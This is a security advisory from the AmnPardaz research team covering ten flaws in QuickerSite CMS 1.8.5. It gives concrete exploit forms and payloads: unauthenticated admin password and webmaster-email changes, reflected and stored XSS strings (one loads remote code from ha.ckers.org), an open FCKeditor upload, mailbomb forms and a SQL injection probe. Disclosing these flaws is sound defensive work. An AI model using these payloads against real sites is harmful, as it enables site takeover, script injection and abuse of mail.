
QuickerSite Multiple Vulnerabilities






########################## www.BugReport.ir #######################################
#
#               AmnPardaz Security Research Team
#
# Title: QuickerSite Multiple Vulnerabilities
# Vendor: www.quickersite.com
# Vulnerable Version: 1.8.5
# Exploit: Available
# Impact: High
# Fix: N/A
# Original Advisory: http://bugreport.ir/index.php?/39
###################################################################################

####################
1. Description:
####################
        QuickerSite is a Content Management System for Windows Servers. It is written in ASP/VBScript with an optional pinch of ASP.NET for true image-resizing capabilities. QuickerSite ships with an Access database, with the option to upsize to SQL Server 2000/2005 for busy sites (>1000 visitors/day).
####################
2. Vulnerabilities:
####################
        2.1. Insecure Direct Object Reference [in "bs_login.asp"]. Everyone can change admin password.
                2.1.1. Exploit:
                                Check the exploit section.
        2.2. Insecure Direct Object Reference [in "bs_login.asp"]. Everyone can edit all the site info, such as the admin email address.
                2.2.1. Exploit:
                                Check the exploit section.
        2.3. Insecure Direct Object Reference [in "bs_login.asp"]. Everyone can edit all the site design. (Also, all the site settings can be changed by other parameters)
                2.3.1. Exploit:
                                Check the exploit section.
        2.4. Failure to Restrict URL Access [in "mailPage.asp"]. Everyone can mailbomb others.
                2.4.1. Exploit:
                                Check the exploit section.
        2.5. Cross Site Scripting (XSS) [in "showThumb.aspx"]. Reflected XSS attack by circumventing the ASP.NET XSS denier (path disclosure when error mode is open).
                2.5.1. Exploit:
                                Check the exploit section.
        2.6. Cross Site Scripting (XSS), Failure to Restrict URL Access [in "process_send.asp"]. Redirect Reflected XSS Attack In "SB_redirect" parameter. Reflected XSS, Content Spoofing In "SB_feedback" parameter. Everyone can mailbomb others.
                2.6.1. Exploit:
                                Check the exploit section.
        2.7. Cross Site Scripting (XSS) [in "picker.asp"]. Reflected XSS attack in "paramCode" and "cColor" parameters.
                2.7.1. Exploit:
                                Check the exploit section.
        2.8. Cross Site Scripting (XSS) [in "rss.asp"]. Stored XSS attack via the "X-FORWARDED-FOR", "QueryString" and "Referer" header parameters. Attacker can execute an XSS against Admin.
                2.8.1. Exploit:
                                Check the exploit section.
        2.9. File uploading is allowed by FCKEDITOR.
                2.9.1. Exploit:
                                Check the exploit section.
        2.10. Injection Flaws [in "/asp/includes/contact.asp"]. SQL Injection on "check" function in "sNickName" parameter.
                2.10.1. Exploit:
                                Check the exploit section.
####################
3. Exploits:
####################
Original Exploit URL: http://bugreport.ir/index.php?/39/exploit

        3.1. Everyone can change admin password.
        -------------
        Form: action="http://[URL]/asp/bs_login.asp?btnAction=cSaveAdminPW" method="post"
        Fields:
                adminPassword:
                adminPasswordConfirm:
        -------------
        3.2. Everyone can edit all the site info, such as the admin email address.
        -------------
        Form: action="http://[URL]/asp/bs_login.asp?btnAction=saveAdmin" method="post"
        Fields:
                Site Url: http://www.VICTIM.com
                Site AlternateDomains: http://www.VICTIM-Backup.com
                Description:
                Site Name:
                Site Title:
                CopyRight:
                Keywords:
                Google Analytics:
                Language:
                DatumFormat:
                Webmaster:
                Webmaster Email: MyEmail-ResetPassword@Hacker.Com
                Default RSS Link: http://www.VICTIM.com/RSS.asp
        -------------
        3.3. Everyone can edit all the site design.
        -------------
        Form: action="http://[URL]/asp/bs_login.asp?btnAction=saveDesign" method="post"
        Fields:
                siteWidth:
                menuWidth:
                bgColorSides:
                bgImageLeft:
                bgImageRight:
                mainBGColor:
                mainBgImage:
                scheidingsLijnColor:
                scheidingsLijnWidth:
                menuBGColor:
                menuBGImage:
                menuBorderColor:
                MenuHoverBGColor:
                subMenuBorderColor:
                fontType:
                fontColor:
                linkColor:
                fontSize:
                fontWeight:
                publicIconColor:
                publicIconColorHover:
                siteAlign:
                menuLocation:
        -------------
        3.4. Everyone can mailbomb others.
        -------------
        Form: action="http://[URL]/mailPage.asp?iId=HILHG" method="post"
        -------------
        3.5. Reflected XSS attack by circumventing the ASP.NET XSS denier (path disclosure when error mode is open).
        -------------
        http://[URL]/showThumb.aspx?img=test.jpg&close='STYLE='IRSDL:expr/**/ession(alert("XSS"))   (IE)
        http://[URL]/showThumb.aspx?img=test.jpg&close='STYLE='-moz-binding:url(%22http://ha.ckers.org/xssmoz.xml%23xss%22)   (Mozilla)
        http://[URL]/showThumb.aspx?img=test.jpg&close='STYLE='IRSDL:expr/**/ession(alert("XSS"));-moz-binding:url(%22http://ha.ckers.org/xssmoz.xml%23xss%22)   (IE+Mozilla)
        http://[URL]/showThumb.aspx   (Path disclosure)
        -------------
        3.6. Redirect Reflected XSS attack in the "SB_redirect" parameter of "process_send.asp". Reflected XSS and Content Spoofing in the "SB_feedback" parameter of "process_send.asp". Everyone can mailbomb others.
        -------------
        Form: action="http://[URL]/default.asp?iId=HILHG&pageAction=send" method="post"
        Fields:
                MailTo:
                Subject:
                Message:
                SB_feedback:
                SB_redirect:
        -------------
        3.7. Reflected XSS attack in the "paramCode" and "cColor" parameters of "picker.asp".
        -------------
        http://[URL]/asp/colorpicker/picker.asp?paramCode=pickerPanel.value=''};alert('XSS')">
        http://[URL]/asp/colorpicker/picker.asp?cColor=irsdl
        -------------
        3.8. Stored XSS attack via the "X-FORWARDED-FOR", "QueryString" and "Referer" header parameters. Attacker can execute an XSS against Admin.
        -------------
        The request headers must look like this:

        GET /rss.asp?iId=IHJEF&s="'> HTTP/1.1
        Host: [URL]
        User-Agent: Not
        Referer: FooNotSite.com"'>
        X-FORWARDED-FOR: "'>
        ACCEPT-LANGUAGE: test
        Accept-Encoding: gzip,deflate
        Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
        Keep-Alive: 300
        Proxy-Connection: keep-alive
        -------------
        3.9. File uploading is allowed by FCKEDITOR.
        -------------
        Form: action="http://[URL]/fckeditor251/editor/filemanager/connectors/asp/upload.asp" method="post"
        -------------
        3.10. SQL Injection on the "check" function in the "sNickName" parameter.
        -------------
        http://[URL]/default.asp?pageAction=profile
        Change "Nickname" to "'or'1'='1" and then to "'or'1'='2" and compare the results.
        -------------
####################
4. Solution:
####################
        Edit the source code to ensure that inputs are properly sanitized for 3.5, 3.6, 3.7, 3.8 and 3.10, and enforce access control for the others.
        Note: First check with the vendor and look for a patch.
####################
- Credit:
####################
        AmnPardaz Security Research & Penetration Testing Group
        Contact: admin[4t}bugreport{d0t]ir
        WwW.BugReport.ir
        WwW.AmnPardaz.com
